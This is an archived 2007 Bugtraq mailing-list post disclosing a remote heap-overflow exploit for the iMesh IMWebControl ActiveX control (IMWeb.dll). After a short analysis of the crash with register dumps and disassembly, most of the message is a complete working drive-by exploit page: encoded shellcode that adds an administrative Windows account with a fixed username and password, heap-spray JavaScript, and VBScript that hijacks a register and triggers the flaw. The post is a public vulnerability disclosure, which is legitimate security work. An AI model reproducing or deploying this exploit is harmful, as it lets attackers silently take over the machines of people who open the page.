lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20071218090053.23709.qmail@securityfocus.com>
Date: 18 Dec 2007 09:00:53 -0000
From: retrog@...ce.it
To: bugtraq@...urityfocus.com
Subject: iMesh <= 7.1.0.x IMWebControl Class (IMWeb.dll 7.0.0.x) remote
 exploit

<!--
iMesh <= 7.1.0.x IMWebControl Class (IMWeb.dll 7.0.0.x) remote heap exploit
(IE7/XP full patched)
by rgod, site: http://retrogod.altervista.org/

software site: http://www.imesh.com

"iMesh is a file sharing and online social network. It uses a proprietary,
centralized, P2P protocol. iMesh is owned by an American company iMesh,
Inc. and maintains a development center in Israel.
iMesh was the first company to introduce "swarming" - the ability to download
one file from multiple sources, increasing download speed."

This is the problem with Imesh client :

passing an empy value to ProcessRequestEx method

EAX 9F291974
ECX 4D554E00 WINHTTP.4D554E00
EDX 017EF438
EBX 00000000
ESP 017EF410
EBP 017EF430
ESI 017EF438
EDI 01F51FF8
EIP 01F23A9C IMWebCon.01F23A9C

...
01F23A90   8B8F A8000000    MOV ECX,DWORD PTR DS:[EDI+A8]
01F23A96   8B01             MOV EAX,DWORD PTR DS:[ECX]
01F23A98   52               PUSH EDX
01F23A99   8BD6             MOV EDX,ESI
01F23A9B   52               PUSH EDX
01F23A9C   FF10             CALL DWORD PTR DS:[EAX] <----- crash

apparently this was unexploitable, ecx points to winhttp.dll which
keeps 0x9f291974, but I found that thru the SetHandler sub
you can hijack ecx to an arbitrary value...
So, setting the value to 218959117 you have:

EAX 017EF438
ECX 0D0D0D0D
EDX 017EF43C
EBX 00000000
ESP 017EF418
EBP 017EF430
ESI 017EF438
EDI 01EF1FF8
EIP 01EC3A96 IMWebCon.01EC3A96

...
01EC3A90   8B8F A8000000    MOV ECX,DWORD PTR DS:[EDI+A8]
01EC3A96   8B01             MOV EAX,DWORD PTR DS:[ECX] <------- crash
01EC3A98   52               PUSH EDX
01EC3A99   8BD6             MOV EDX,ESI
01EC3A9B   52               PUSH EDX
01EC3A9C   FF10             CALL DWORD PTR DS:[EAX]

Access violation when reading 0D0D0D0D
Now it is exploitable...
This add an administrative account
I used various stages of heap spray, do not crash just freeze, worked fine, 80%

-->
<html>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object>
<SCRIPT language="javascript">
//add su one, user: sun pass: tzu
shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u
 426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570");
bigblock  = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (i=0;i<77;i++){memory[i] = block+shellcode}
bigblock  = unescape("%u0707%u0707");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=77;i<144;i++){memory[i] = block+shellcode}
bigblock  = unescape("%u0909%u0909");
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
for (i=144;i<500;i++){memory[i] = block+shellcode}
</script>
<script language='vbscript'>
puf=218959117 'set ecx to 0x0d0d0d0d
IMWebControl.SetHandler puf
puf=""
IMWebControl.ProcessRequestEx puf
</script>
</html>

original url: http://retrogod.altervista.org/rgod_imesh.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ